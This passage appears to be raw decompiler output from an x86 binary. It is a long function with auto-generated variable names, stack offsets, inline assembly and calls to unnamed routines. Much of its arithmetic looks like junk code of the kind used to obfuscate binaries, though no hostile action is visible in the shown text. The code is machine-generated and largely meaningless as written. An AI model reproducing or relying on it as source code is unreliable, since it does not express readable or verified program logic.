					 *(_t1816 - 0x78) = _t1496;
					_t1043 =  *(_t1768 + 0x3c);
					asm("sbb eax, edx");
					 *(_t1816 - 0x18c) =  *((intOrPtr*)(_t1768 + 0x38)) - ( *(_t1767 + 0x10) & 0x0000ffff) + 0xffdffbd8;
					_t1791 =  *(_t1816 - 0xbf) & 0x000000ff;
					asm("adc eax, 0xffffffff");
					_t1542 = _t1541 + 0xff;
					 *(_t1816 - 0x120) = _t1542;
					 *(_t1816 - 0xfb) = _t1542;
					 *(_t1816 - 0x14) = ( *(_t1816 - 0x26c) >> 0x10) - 1;
					_t1702 =  *(_t1816 - 0x190) + _t1791;
					 *(_t1816 - 0x184) = _t1043 >> 0x14;
					_t1045 =  *(_t1816 - 0xf6);
					 *(_t1816 - 0x134) = _t1791;
					 *(_t1816 - 0x174) = _t1702;
					 *(_t1816 - 0x29c) = _t1702;
					 *(_t1816 - 0x194) = (_t1043 << 0x00000020 |  *(_t1816 - 0x18c)) >> 0x14;
					 *(_t1816 - 0xc8) = _t1045;
					__eflags = _t1045;
					if(_t1045 == 0) {
						_t1497 = _t1496 + 1;
						__eflags = _t1497;
						asm("cdq");
						_t1769 = 3;
						 *(_t1816 - 0x78) = _t1497;
						_t1498 =  *(_t1816 - 0x15e) & 0x000000ff;
						 *(_t1816 - 0xbd) = 0x6b;
						 *(_t1816 - 0xe0) = _t1498;
					} else {
						_t1769 = 2;
						 *(_t1816 - 0xbd) = 0x6a;
						 *(_t1816 - 0xc2) = 3;
						 *(_t1816 - 0x10c) = 3;
						_t141 = _t1769 + 0x24; // 0x26
						_t1498 = _t141;
					}
					 *(_t1816 - 0x190) = 0;
					 *(_t1816 - 0x180) = ( *(_t1816 - 0xda) & 0x000000ff) + _t1498;
					 *(_t1816 - 0x21e) = ( *(_t1816 - 0xda) & 0x000000ff) * (_t1498 & 0x0000ffff);
					_t1051 =  *( *((intOrPtr*)(_t1816 - 0x188)) + 0x12) & 0x0000ffff;
					_t1547 = _t1051;
					__eflags = _t1051;
					 *(_t1816 - 0xcc) =  *(_t1816 - 0x280);
					 *(_t1816 - 0x136) =  *(_t1816 - 0x1c8);
					if(_t1051 == 0) {
						 *(_t1816 - 0x114) =  *(_t1816 - 0x1a4);
					} else {
						_push(_t1498);
						asm("cdq");
						_t1471 = E00B02960( *(_t1816 - 0x194),  *(_t1816 - 0x184), _t1547, _t1702);
						 *(_t1816 - 0x60) = _t1498;
						 *((char*)(_t1816 - 0xd4)) =  *((char*)(_t1816 - 0xd4)) + 0x25;
						_t1498 =  *(_t1816 - 0xe0);
						 *(_t1816 - 0x194) = _t1471;
						 *(_t1816 - 0x190) = _t1547 & 0x0000ffff;
						 *(_t1816 - 0x184) = _t1702;
						 *((short*)(_t1816 - 0x1f8)) = ( *(_t1816 - 0x12c) >> 0x18) - 1;
						 *((char*)(_t1816 - 0xec)) = 0x47;
						 *(_t1816 - 0xd0) = ( *(_t1816 - 0x136) & 0x0000ffff) + 1 + ( *(_t1816 - 0xcc) & 0x0000ffff);
						_t1477 =  *(_t1816 - 0x1a4) + 1;
						 *(_t1816 - 0x114) = _t1477;
						 *(_t1816 - 0x1a4) = _t1477;
						_t1479 =  *(_t1816 - 0xf4) >> 0x18;
						 *(_t1816 - 0x224) = _t1479;
						 *(_t1816 - 0x14c) = _t1479;
					}
					asm("cdq");
					_t1703 = E00B030D0( *(_t1816 - 0xc3) & 0x000000ff, _t1702,  *(_t1816 - 0x118),  *(_t1816 - 0x17c));
					_t1057 =  *((intOrPtr*)(_t1816 - 0x234));
					 *(_t1816 - 0xc0) = _t1057;
					 *((char*)(_t1816 - 0x166)) = _t1057 +  *(_t1816 - 0xbe);
					_t1061 =  *(_t1816 - 0x10b) -  *((intOrPtr*)(_t1816 - 0x2a4)) - 1;
					 *((char*)(_t1816 - 0x10e)) = _t1703;
					_t190 = _t1816 - 0x18c;
					 *_t190 =  *(_t1816 - 0x18c) & 0x000fffff;
					__eflags =  *_t190;
					 *(_t1816 - 0xc4) = _t1061;
					 *(_t1816 - 0x162) = _t1061;
					do {
						_t1063 =  *(_t1816 - 0x29e) - 1;
						_t1498 = _t1498 + 1;
						_t1548 = _t1063 & 0x0000ffff;
						asm("adc esi, 0x0");
						 *(_t1816 - 0xe0) = _t1548;
						 *(_t1816 - 0x29e) = _t1063;
						_t1769 = _t1769 - 1;
						__eflags = _t1769;
					} while (_t1769 != 0);
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x1dc], xmm0");
					 *(_t1816 - 0x16c) =  *(_t1816 - 0x180) + 0xfffffffe;
					 *(_t1816 - 0x68) = _t1769;
					__eflags = _t1703;
					if(_t1703 == 0) {
						_t1704 = _t1498;
						_t1068 =  *((intOrPtr*)(_t1816 - 0x24c)) - _t1704 -  *(_t1816 - 0x160);
						__eflags = _t1068;
						 *(_t1816 - 0xe3) = _t1068;
						 *(_t1816 - 0xf8) = _t1068;
					} else {
						_t1466 =  *(_t1816 - 0xbd) -  *(_t1816 - 0x160) +  *(_t1816 - 0xbf);
						 *(_t1816 - 0xc8) = _t1466;
						 *(_t1816 - 0xf6) = _t1466;
						_t1068 =  *(_t1816 - 0xe3);
						_t1548 =  *(_t1816 - 0xe0);
						 *(_t1816 - 0x16c) = 0x567 % ( *(_t1816 - 0x78) & 0x000000ff);
						_t1704 = _t1498;
					}
					_t1770 =  *(_t1816 - 0x26c);
					_t1549 = _t1548 & 0x0000ffff;
					__eflags =  *(_t1816 - 0x134) - _t1770;
					if( *(_t1816 - 0x134) <= _t1770) {
						_t1502 =  *(_t1816 - 0xf9) + _t1704;
						_t1771 = _t1770 + 1;
						__eflags = _t1771;
						 *(_t1816 - 0xc2) = _t1502;
						 *(_t1816 - 0x10c) = _t1502;
						 *(_t1816 - 0x16c) = (_t1068 & 0x000000ff) * ( *(_t1816 - 0x14) & 0x0000ffff);
					} else {
						_t1463 =  *((intOrPtr*)(_t1816 - 0x24e));
						_t1771 = _t1770 + 1;
						 *((short*)(_t1816 - 0x268)) =  *((short*)(_t1816 - 0x268)) + 1;
						 *(_t1816 - 0xc3) = _t1463;
						 *(_t1816 - 0xf9) = _t1463;
						 *((short*)(_t1816 - 0x24c)) = _t1498 * _t1549;
						_t1502 =  *(_t1816 - 0xc2);
					}
					 *((short*)(_t1816 - 0x26a)) = 4;
					_t1793 =  *(_t1816 - 0x108);
					_t1554 =  *(_t1816 - 0x29a) & 0x0000ffff;
					 *((short*)(_t1816 - 0x300)) =  *((intOrPtr*)(_t1816 - 0x21c)) +  *((intOrPtr*)(_t1816 - 0x268)) + 3;
					_t1074 =  *(_t1816 - 0x15c);
					 *(_t1816 - 0x118) = _t1074;
					 *(_t1816 - 0x110) = _t1074;
					_t1075 =  *(_t1816 - 0x2fc) & 0x0000ffff;
					 *(_t1816 - 0x180) = _t1554;
					_t1555 = _t1075 / _t1554;
					 *(_t1816 - 0x26c) = _t1771 + 1;
					_t1773 =  *(_t1816 - 0x140);
					asm("cdq");
					 *(_t1816 - 0x134) =  *(_t1816 - 0x174) & 0x0000ffff;
					_t1079 =  *((intOrPtr*)(_t1816 - 0x268));
					 *(_t1816 - 0xe0) = _t1555;
					 *(_t1816 - 0x18) = _t1075 % _t1554;
					 *((char*)(_t1816 - 0x4d)) = 1;
					 *(_t1816 - 0x174) = 0xffff;
					 *(_t1816 - 0xc3) = _t1079;
					__eflags = _t1555;
					if(_t1555 != 0) {
						_t1757 =  *(_t1816 - 0x118);
						_t1782 = _t1555;
						_t1812 = 0x2c64;
						_t1681 = _t1079;
						do {
							_t1681 = _t1681 + 0x60;
							 *(_t1816 - 0x266) =  *(_t1816 - 0x266) * 0x2548;
							_t1812 = _t1812 + 0xffff;
							_t1757 = (_t1681 & 0x000000ff) * (_t1757 & 0x000000ff);
							 *((short*)(_t1816 - 0x238)) = _t1812;
							 *(_t1816 - 0x15c) = _t1757;
							_t1782 = _t1782 - 1;
							__eflags = _t1782;
						} while (_t1782 != 0);
						_t1773 =  *(_t1816 - 0x140);
						_t1793 =  *(_t1816 - 0x108);
						 *(_t1816 - 0x167) = _t1681;
						 *(_t1816 - 0x118) = _t1757;
					}
					_t1707 =  *((intOrPtr*)(_t1816 - 0x188));
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x64], xmm0");
					 *((intOrPtr*)(_t1816 - 0x5c)) =  *((intOrPtr*)(_t1707 + 0x20)) + 1;
					_t1558 =  *(_t1816 - 0x160) & 0x000000ff;
					asm("adc eax, 0x0");
					 *((intOrPtr*)(_t1816 - 0x58)) =  *((intOrPtr*)(_t1707 + 0x24));
					_t1083 =  *(_t1816 - 0x2a0) -  *((intOrPtr*)(_t1816 - 0x2a4)) - 1;
					 *(_t1816 - 0x2a8) = _t1083;
					 *(_t1816 - 0x236) = _t1083;
					__eflags = _t1558 - 0x71;
					if(_t1558 > 0x71) {
						_t1459 =  *(_t1816 - 0x120);
						_t1679 = _t1558 + 0xffffff8f;
						_t279 = _t1816 - 0x10b;
						 *_t279 =  *(_t1816 - 0x10b) + _t1679;
						__eflags =  *_t279;
						do {
							_t1793 = _t1793 +  *(_t1816 - 0x174);
							_t1459 = _t1459 - 1;
							 *(_t1816 - 0xfb) = _t1459;
							_t1679 = _t1679 - 1;
							__eflags = _t1679;
						} while (_t1679 != 0);
					}
					__eflags =  *((short*)(_t1816 - 0x2f4));
					_t1084 =  *(_t1816 - 0x78);
					 *((intOrPtr*)(_t1816 - 0x74)) = 0x100000;
					 *(_t1816 - 0x70) = 0;
					if( *((short*)(_t1816 - 0x2f4)) != 0) {
						L33:
						 *(_t1816 - 0x160) =  *(_t1816 - 0xc0);
						 *((short*)(_t1816 - 0x300)) = 6;
					} else {
						__eflags = _t1084;
						if(_t1084 != 0) {
							goto L33;
						}
					}
					_push( *(_t1816 + 8));
					 *(_t1816 - 0xf7) = _t1084 + 1;
					 *((char*)(_t1816 - 0x10d)) =  *(_t1816 - 0xbe) - 1;
					_t1794 = _t1793 + 1;
					 *(_t1816 - 0x78) = 0;
					 *(_t1816 - 0x108) = _t1794;
					 *(_t1816 - 0x220) = _t1794;
					 *(_t1816 - 0x17c) = 2;
					 *(_t1816 - 0x120) = 0;
					_t1089 = E00AE2EF0(_t1502,  *((intOrPtr*)(_t1773 + 0x28)),  *((intOrPtr*)( *((intOrPtr*)(_t1773 + 0x2c)))), _t1773, _t1794, _t1816 - 0x78,  *((intOrPtr*)( *((intOrPtr*)(_t1773 + 0x30)))), _t1707 + 0x28, 0x400, _t1816 - 0x2c);
					_t1565 =  *(_t1816 - 0xe3) & 0x000000ff;
					_t1820 = _t1819 + 0x18;
					_t1710 = _t1089;
					__eflags = _t1565 - 0x67;
					if(_t1565 <= 0x67) {
						_t1090 =  *(_t1816 - 0xfa);
					} else {
						_t1678 = _t1565 + 0xffffff99;
						 *((short*)(_t1816 - 0x250)) = 0x17d4 + _t1678;
						_t1458 =  *(_t1816 - 0xfa);
						asm("o16 nop [eax+eax]");
						do {
							_t1458 = _t1458 - 1;
							 *(_t1816 - 0xfa) = _t1458;
							_t1678 = _t1678 - 1;
							__eflags = _t1678;
						} while (_t1678 != 0);
					}
					 *(_t1816 - 0xbf) = _t1090;
					__eflags = _t1710;
					if(_t1710 > 0) {
						__eflags =  *(_t1816 - 0x163) -  *(_t1816 - 0xda);
						if( *(_t1816 - 0x163) >  *(_t1816 - 0xda)) {
							_t1443 =  *(_t1816 - 0x2a0) & 0x0000ffff;
							__eflags = _t1443 %  *(_t1816 - 0xe0);
							 *(_t1816 - 0x16c) = _t1443 /  *(_t1816 - 0xe0);
						}
						_t1566 =  *(_t1816 - 0x1d8);
						_t1712 =  *((intOrPtr*)(_t1816 - 0x1dc)) + 0xfffffbee;
						asm("adc ecx, 0xffffffff");
						 *((intOrPtr*)(_t1816 - 0x1dc)) = _t1712;
						 *(_t1816 - 0x1d8) = _t1566;
						 *((short*)(_t1816 - 0x232)) =  *(_t1816 - 0xe0) + 2;
						_t1096 =  *(_t1816 - 0x26c) + 1 +  *(_t1816 - 0x2f8);
						 *(_t1816 - 0xbd) = _t1096;
						 *(_t1816 - 0xfc) = _t1096;
						_t1097 =  *(_t1816 - 0x134);
						 *(_t1816 - 0xdb) = _t1097;
						_t1503 =  *(_t1816 - 0x161);
						_push(_t1566);
						_t1099 = _t1097 - _t1502 + _t1503;
						_push(_t1712);
						_push(2);
						 *(_t1816 - 0xbe) = _t1099;
						 *(_t1816 - 0xf7) = _t1099;
						_t1100 = E00AEE7E0(_t1099, _t1503,  *((intOrPtr*)(_t1773 + 0x34)), 0, _t1773, _t1794);
						_t1821 = _t1820 + 0xc;
						__eflags = _t1100;
						if(_t1100 != 0) {
							 *(_t1816 - 0x258) =  *(_t1816 - 0x1b0) + 1;
							 *((short*)(_t1816 - 0x26a)) = 5;
							__eflags =  *(_t1816 + 8);
							_t1569 =  *((intOrPtr*)(_t1816 - 0x12e));
							 *((short*)(_t1816 - 0x256)) =  *(_t1816 - 0x29c) +  *(_t1816 - 0x16c) + ( *(_t1816 - 0x29a) & 0x0000ffff);
							_t1107 =  *(_t1816 - 0x1ca);
							 *(_t1816 - 0x177) = _t1569;
							 *((char*)(_t1816 - 0xe1)) = _t1107;
							if( *(_t1816 + 8) == 0) {
								 *(_t1816 - 0xc9) =  *(_t1816 - 0xee);
							} else {
								 *((char*)(_t1816 - 0x4d)) = 2;
								_t1437 = _t1107 - 1 +  *((intOrPtr*)(_t1816 - 0xc1));
								 *(_t1816 - 0xc9) = _t1437;
								 *(_t1816 - 0xee) = _t1437;
								 *((short*)(_t1816 - 0x1f0)) = ( *(_t1816 - 0xd9) & 0x000000ff) + 1;
								 *(_t1816 - 0x13c) =  *(_t1816 - 0xd0) - (_t1569 & 0x000000ff) + 1;
							}
							_t1112 =  *(_t1816 - 0xbd) + 1;
							 *(_t1816 - 0xbd) = _t1112;
							 *(_t1816 - 0xfc) = _t1112;
							 *(_t1816 - 0x2a0) =  *((intOrPtr*)(_t1816 - 0x254)) - 1;
							_t1116 =  *(_t1816 - 0x118) - 1;
							 *(_t1816 - 0x118) = _t1116;
							 *(_t1816 - 0x15c) = _t1116;
							_push(0);
							_push(_t1816 - 0x68);
							_push(1);
							_t1118 = E00AEE380(_t1816 - 0x68, _t1503,  *((intOrPtr*)(_t1773 + 0x34)), _t1816 - 0x4d, _t1773, _t1794);
							_t1822 = _t1821 + 0xc;
							__eflags = _t1118;
							if(_t1118 != 0) {
								_t1119 =  *(_t1816 - 0x16c);
								__eflags = _t1119 - 0x27c7;
								if(_t1119 > 0x27c7) {
									_t1428 = _t1119 + 0xffffd839;
									 *((short*)(_t1816 - 0x234)) = 0x487d + _t1428;
									_t1663 =  *(_t1816 - 0xc4) + _t1428;
									 *(_t1816 - 0xc4) = _t1663;
									 *(_t1816 - 0x162) = _t1663;
									_t1665 =  *(_t1816 - 0xe3) + _t1428;
									__eflags = _t1665;
									 *(_t1816 - 0xf8) = _t1665;
									 *(_t1816 - 0xc0) =  *((intOrPtr*)(_t1816 - 0x234));
								}
								 *((char*)(_t1816 - 0x168)) =  *((char*)(_t1816 - 0x168)) - 1;
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x1dc], xmm0");
								_push( *(_t1816 - 0x1d8));
								 *(_t1816 - 0x118) = 2;
								_push( *((intOrPtr*)(_t1816 - 0x1dc)));
								 *(_t1816 - 0x15c) = 2;
								_t1123 =  *(_t1816 - 0xbe) -  *((intOrPtr*)(_t1816 - 0x2f4)) + 1;
								_push(2);
								 *(_t1816 - 0xc8) = _t1123;
								 *(_t1816 - 0xf6) = _t1123;
								_t1124 = E00AEE7E0(_t1123, _t1503,  *((intOrPtr*)(_t1773 + 0x34)), 0, _t1773, _t1794);
								_t1823 = _t1822 + 0xc;
								__eflags = _t1124;
								if(_t1124 != 0) {
									 *((char*)(_t1816 - 0x165)) =  *(_t1816 - 0xdb) - 1;
									_t1128 =  *(_t1816 - 0x21e) - 1;
									 *(_t1816 - 0x14) = _t1128;
									 *(_t1816 - 0x120) = _t1128;
									 *(_t1816 - 0x21e) = _t1128;
									_push(0);
									_push(_t1816 - 0x68);
									_push(0x400);
									_t1130 = E00AEE380(_t1816 - 0x68, _t1503,  *((intOrPtr*)(_t1773 + 0x34)),  *((intOrPtr*)(_t1816 - 0x188)) + 0x28, _t1773, _t1794);
									_t1824 = _t1823 + 0xc;
									 *(_t1816 - 0x174) = _t1130;
									__eflags =  *((short*)(_t1816 - 0x2fe)) - 2;
									if( *((short*)(_t1816 - 0x2fe)) <= 2) {
										_t1573 =  *(_t1816 - 0x14);
										_t1718 = 2;
									} else {
										_t1573 =  *(_t1816 - 0x120) - 1;
										 *(_t1816 - 0x258) = ( *(_t1816 - 0x160) & 0x000000ff) + ( *(_t1816 - 0x15e) & 0x000000ff);
										_t1718 = ( *(_t1816 - 0x15e) & 0x000000ff) + (_t1573 & 0x0000ffff);
										 *(_t1816 - 0x21e) = _t1573;
										 *(_t1816 - 0x17c) = _t1718;
										 *(_t1816 - 0xf8) = ( *(_t1816 - 0x29a) & 0x0000ffff) -  *(_t1816 - 0xc4) - 1;
										 *(_t1816 - 0x120) = 0;
										 *(_t1816 - 0xfb) = ( *(_t1816 - 0xc8) & 0x000000ff) + 1;
										_t1130 =  *(_t1816 - 0x174);
									}
									__eflags = _t1130;
									if(_t1130 == 0) {
										L127:
										_t1719 = 0xfe;
										goto L143;
									} else {
										_t469 = _t1718 + 1; // 0x3
										 *(_t1816 - 0x167) = 2;
										 *(_t1816 - 0x266) = _t469;
										 *((intOrPtr*)(_t1816 - 0x1dc)) = 0x100000;
										_t1155 =  *(_t1816 - 0x16c) - _t1573 + 1;
										 *(_t1816 - 0x1d8) = 0;
										 *(_t1816 - 0x174) = _t1155;
										 *(_t1816 - 0x10b) = _t1155;
										__eflags = _t1503;
										if(_t1503 == 0) {
											L63:
											asm("cdq");
											asm("cdq");
											 *(_t1816 - 0x134) = (_t1503 & 0x000000ff) - ( *(_t1816 - 0x2f8) & 0x0000ffff);
											asm("sbb edx, esi");
											_t1794 =  *(_t1816 - 0x108);
											 *(_t1816 - 0x18) = _t1718;
											 *(_t1816 - 0x170) = 0x683;
											 *((short*)(_t1816 - 0x24e)) = 0x10682;
											_t1163 =  *(_t1816 - 0xc0) -  *(_t1816 - 0x134) +  *(_t1816 - 0x17c);
											__eflags = _t1163;
											 *(_t1816 - 0x15d) = _t1163;
										} else {
											__eflags =  *(_t1816 - 0xbd);
											if( *(_t1816 - 0xbd) == 0) {
												goto L63;
											} else {
												asm("cdq");
												 *(_t1816 - 0x17c) = _t1155 & 0x000000ff;
												_t1163 =  *(_t1816 - 0x16c) + 2;
												 *(_t1816 - 0x120) = _t1718;
												 *(_t1816 - 0x180) =  *(_t1816 - 0x16c) + 2;
											}
										}
										_push(0);
										_push(0x100000);
										_push(0);
										 *(_t1816 - 0x120) = E00AEE7E0(_t1163, _t1503,  *((intOrPtr*)(_t1773 + 0x34)), 0, _t1773, _t1794);
										_t1826 = _t1824 + 0xc;
										_t1721 =  *(_t1816 - 0xbe) & 0x000000ff;
										__eflags = _t1721 - 0xce;
										if(_t1721 > 0xce) {
											_t1751 = _t1721 + 0xffffff32;
											 *(_t1816 - 0x110) =  *(_t1816 - 0x110) + _t1751;
											 *((intOrPtr*)(_t1816 - 0x2f6)) =  *((intOrPtr*)(_t1816 - 0x2f6)) + _t1751;
											 *((intOrPtr*)(_t1816 - 0x10e)) =  *((intOrPtr*)(_t1816 - 0x10e)) + (_t1751 & 0x000000ff) * ( *(_t1816 - 0xbf) & 0x000000ff);
											_t1417 = 2 + (_t1751 & 0x000000ff) * 0x3d;
											__eflags = _t1417;
											 *(_t1816 - 0x118) = _t1417;
											 *(_t1816 - 0x15c) = _t1417;
										}
										__eflags =  *(_t1816 - 0x120);
										if( *(_t1816 - 0x120) != 0) {
											_t1584 =  *(_t1816 - 0x180);
											 *(_t1816 - 0xfc) = _t1503;
											 *((intOrPtr*)(_t1816 - 0x64)) =  *((intOrPtr*)(_t1816 - 0x64)) + 0xfffff7f8;
											 *(_t1816 - 0x258) = ( *(_t1816 - 0x163) & 0x000000ff) + _t1584 +  *(_t1816 - 0x170);
											asm("adc dword [ebp-0x60], 0xffffffff");
											 *(_t1816 - 0x134) = _t1584;
											 *(_t1816 - 0x18) = 0;
											__eflags = _t1584 - 0x27c9;
											if(_t1584 > 0x27c9) {
												_t1655 = _t1584 + 0xffffd837;
												_t1523 = _t1503 + (_t1655 & 0x000000ff) * 0x3d;
												__eflags = _t1523;
												 *(_t1816 - 0xc2) = _t1523;
												 *(_t1816 - 0x10c) = _t1523;
												do {
													_t1794 = _t1794 + 0xffff;
													 *(_t1816 - 0x220) = _t1794;
													_t1523 = (_t1523 << 3) - _t1523 << 3;
													_t1655 = _t1655 - 1;
													__eflags = _t1655;
												} while (_t1655 != 0);
												_t1773 =  *(_t1816 - 0x140);
												 *(_t1816 - 0x161) = _t1523;
											}
											__eflags =  *(_t1816 + 8);
											asm("xorps xmm0, xmm0");
											if( *(_t1816 + 8) == 0) {
												__eflags =  *(_t1816 - 0x184);
												asm("movlpd [ebp-0x1c], xmm0");
												if(__eflags < 0) {
													L128:
													_t1506 =  *(_t1816 - 0xf2);
													goto L129;
												} else {
													if(__eflags > 0) {
														L120:
														_t1511 =  *(_t1816 - 0xf2);
														_t1802 =  *(_t1816 - 0x1c);
														 *(_t1816 - 0x120) = ( *(_t1816 - 0xc9) & 0x000000ff) + ( *(_t1816 - 0x1a8) & 0x0000ffff) - ( *(_t1816 - 0x210) & 0x0000ffff);
														_t1219 =  *((intOrPtr*)(_t1816 - 0xf3)) -  *((intOrPtr*)(_t1816 - 0xec));
														__eflags = _t1219;
														 *(_t1816 - 0xc6) = _t1219;
														 *(_t1816 - 0xcc) =  *(_t1816 - 0x282);
														 *(_t1816 - 0x114) = 0xd6d9;
														 *(_t1816 - 0x1ac) =  *(_t1816 - 0x18);
														while(1) {
															_push( *( *((intOrPtr*)(_t1816 - 0x188)) + 0x12) & 0x0000ffff);
															E00AE91E0( *( *((intOrPtr*)(_t1816 - 0x188)) + 0x12) & 0x0000ffff, _t1511,  *((intOrPtr*)(_t1773 + 0x34)), _t1816 - 0x74);
															 *(_t1816 - 0x13c) =  *(_t1816 - 0x120);
															_t1227 =  *(_t1816 - 0xc7) - 1;
															 *(_t1816 - 0xc7) = _t1227;
															 *(_t1816 - 0x152) = _t1227;
															_t1229 =  *(_t1816 - 0xcc) + 1;
															 *(_t1816 - 0xcc) = _t1229;
															 *(_t1816 - 0x282) = _t1229;
															 *(_t1816 - 0x1ce) =  *(_t1816 - 0x1ce) + 0xffff;
															 *((intOrPtr*)(_t1816 - 0x1cc)) =  *((intOrPtr*)(_t1816 - 0x1cc)) + 0xffff;
															 *((char*)(_t1816 - 0x14a)) =  *(_t1816 - 0xc6);
															_t1234 = E00AE47F0( *(_t1816 - 0x78), _t1816 - 0x2c, _t1773, _t1802,  *((intOrPtr*)(_t1773 + 0x34)),  *((intOrPtr*)(_t1773 + 0x40)), 0x100000, 0, _t1816 - 0x5c, _t1816 - 0x64, 0, 0);
															_t1826 = _t1826 + 0x24;
															__eflags = _t1234;
															if(_t1234 <= 0) {
																break;
															}
															 *(_t1816 - 0x1d0) =  *(_t1816 - 0x1d0) + 0x2fa;
															 *(_t1816 - 0x13c) =  *(_t1816 - 0x13c) + 3;
															 *((intOrPtr*)(_t1816 - 0x5c)) =  *((intOrPtr*)(_t1816 - 0x5c)) + 1;
															asm("adc dword [ebp-0x58], 0x0");
															_t1511 = _t1511 + 1;
															_t1802 = _t1802 + 1;
															 *(_t1816 - 0xf2) = _t1511;
															 *(_t1816 - 0x20c) =  *(_t1816 - 0x20c) * ( *(_t1816 - 0x12d) & 0x000000ff) * ( *(_t1816 - 0x12d) & 0x000000ff) * ( *(_t1816 - 0x12d) & 0x000000ff);
															 *(_t1816 - 0x1a4) =  *(_t1816 - 0x114);
															_t1247 =  *(_t1816 - 0x1ac);
															asm("adc eax, 0x0");
															 *(_t1816 - 0x1ac) = _t1247;
															__eflags = _t1247 -  *(_t1816 - 0x184);
															if(__eflags < 0) {
																continue;
															} else {
																if(__eflags > 0) {
																	L129:
																	 *(_t1816 - 0x1a8) =  *(_t1816 - 0x1a8) * ( *(_t1816 - 0xd7) & 0x000000ff) * ( *(_t1816 - 0xd7) & 0x000000ff) * ( *(_t1816 - 0xd7) & 0x000000ff);
																	 *(_t1816 - 0x1f6) = 0x6b16 + ( *(_t1816 - 0x12f) & 0x000000ff) * 0xfffd;
																	_t1800 =  *(_t1816 - 0x190) & 0x0000ffff;
																	__eflags = _t1800;
																	if(_t1800 != 0) {
																		 *(_t1816 - 0xc6) = 0xe2 -  *(_t1816 - 0x1a6) -  *((intOrPtr*)(_t1816 - 0x144));
																		_t1510 =  *(_t1816 - 0xc6);
																		_t1212 =  *(_t1816 - 0x13c) * 0x2a25;
																		_t915 = _t1816 - 0x20a;
																		 *_t915 =  *(_t1816 - 0x20a) + _t1800;
																		__eflags =  *_t915;
																		 *(_t1816 - 0x100) = ( *(_t1816 - 0xf4) & 0x000000ff) + 0x1b14;
																		 *(_t1816 - 0x120) =  *(_t1816 - 0x13c) * 0x2a25;
																		do {
																			_push(2);
																			E00AE91E0(_t1212, _t1510,  *((intOrPtr*)(_t1773 + 0x34)), _t1816 - 0x74);
																			_t1214 = _t1510;
																			_t1826 = _t1826 + 4;
																			 *(_t1816 - 0x104) = _t1214;
																			 *(_t1816 - 0xd5) = _t1214;
																			_t1212 =  *(_t1816 - 0x120);
																			 *(_t1816 - 0x1d0) =  *(_t1816 - 0x120);
																			_t1800 = _t1800 - 1;
																			__eflags = _t1800;
																		} while (_t1800 != 0);
																		_t1506 =  *(_t1816 - 0xc2);
																	}
																	_t1723 =  *(_t1816 - 0x18c);
																	 *(_t1816 - 0x1f4) = 0x1b14 +  *((intOrPtr*)(_t1816 - 0x1f8)) +  *((intOrPtr*)(_t1816 - 0x1c4));
																	_t1588 =  *(_t1816 - 0xd0);
																	 *(_t1816 - 0x127) =  *(_t1816 - 0xf0) - 0x1e + _t1588;
																	__eflags = _t1723;
																	 *(_t1816 - 0xf2) = _t1506 + 1;
																	if(_t1723 == 0) {
																		L137:
																		 *(_t1816 - 0x1a4) =  *(_t1816 - 0x114) + 0xe83c;
																		 *(_t1816 - 0x1ca) =  *(_t1816 - 0x1ca) + 0x17dc;
																		_t1187 =  *(_t1816 - 0x224) - 1;
																		__eflags = _t1187;
																		 *(_t1816 - 0xd0) = _t1588 + 0x24d3;
																		 *(_t1816 - 0x14c) = _t1187;
																		goto L138;
																	} else {
																		_t1197 = ( *(_t1816 - 0x14f) & 0x000000ff) + _t1588 + 0x4e2;
																		_t1801 = _t1197 & 0x0000ffff;
																		 *(_t1816 - 0x208) = _t1197;
																		_t1200 = E00AE47F0( *(_t1816 - 0x78), _t1816 - 0x2c, _t1773, _t1801,  *((intOrPtr*)(_t1773 + 0x34)),  *((intOrPtr*)(_t1773 + 0x40)), _t1723, 1, _t1816 - 0x5c, _t1816 - 0x64, 0, 0);
																		__eflags = _t1200;
																		if(_t1200 > 0) {
																			_t1588 = ( *(_t1816 - 0x129) & 0x000000ff) - ( *(_t1816 - 0x1a2) & 0x0000ffff) + ( *(_t1816 - 0xed) & 0x000000ff);
																			__eflags = _t1588;
																			_t953 = _t1801 + 1; // 0x6b17
																			 *(_t1816 - 0x208) = _t953;
																			goto L137;
																		} else {
																			 *((char*)(_t1816 - 0x154)) = ( *(_t1816 - 0x280) & 0x000000ff) -  *(_t1816 - 0x104);
																			 *(_t1816 - 0x284) =  *(_t1816 - 0xef) & 0x000000ff;
																			 *(_t1816 - 0x126) = ( *(_t1816 - 0x282) & 0x000000ff) * ( *(_t1816 - 0x143) & 0x000000ff);
																		}
																	}
																	goto L142;
																} else {
																	__eflags = _t1802 -  *(_t1816 - 0x194);
																	if(_t1802 <  *(_t1816 - 0x194)) {
																		continue;
																	} else {
																		goto L129;
																	}
																}
															}
															goto L143;
														}
														 *(_t1816 - 0x127) =  *(_t1816 - 0xcc) +  *((intOrPtr*)(_t1816 - 0x20e)) +  *(_t1816 - 0x13c);
														_t1240 =  *(_t1816 - 0x1a4) +  *(_t1816 - 0x1c6) +  *((intOrPtr*)(_t1816 - 0xc1));
														__eflags = _t1240;
														 *(_t1816 - 0xf4) = _t1240;
														goto L127;
													} else {
														__eflags =  *(_t1816 - 0x194);
														if( *(_t1816 - 0x194) <= 0) {
															goto L128;
														} else {
															goto L120;
														}
													}
												}
												goto L143;
											} else {
												_t1250 =  *(_t1816 - 0x1a6) + 1 +  *(_t1816 - 0x210);
												 *(_t1816 - 0xbe) = _t1250;
												 *(_t1816 - 0x150) = _t1250;
												_t1610 = ( *(_t1816 - 0x126) & 0x000000ff) - ( *(_t1816 - 0x149) & 0x000000ff) + 0x2a25;
												asm("movlpd [ebp-0xb4], xmm0");
												_t1731 =  *(_t1816 - 0x104) + 0xec;
												asm("movlpd [ebp-0xac], xmm0");
												asm("movlpd [ebp-0xa4], xmm0");
												asm("movlpd [ebp-0x9c], xmm0");
												_t1252 = _t1610 + 1;
												asm("movlpd [ebp-0x94], xmm0");
												 *(_t1816 - 0xdb) = _t1252;
												 *(_t1816 - 0xd8) = _t1252;
												_t1254 = 0x4e2 -  *(_t1816 - 0x1d0);
												 *(_t1816 - 0x1b0) = _t1254;
												 *(_t1816 - 0x288) = _t1254;
												asm("movlpd [ebp-0x8c], xmm0");
												 *(_t1816 - 0xc9) = 0x4a;
												 *(_t1816 - 0x149) = 0x4a - _t1610;
												_t1258 =  *(_t1816 - 0xe5) + 1;
												asm("movlpd [ebp-0x84], xmm0");
												 *(_t1816 - 0xe5) = _t1258;
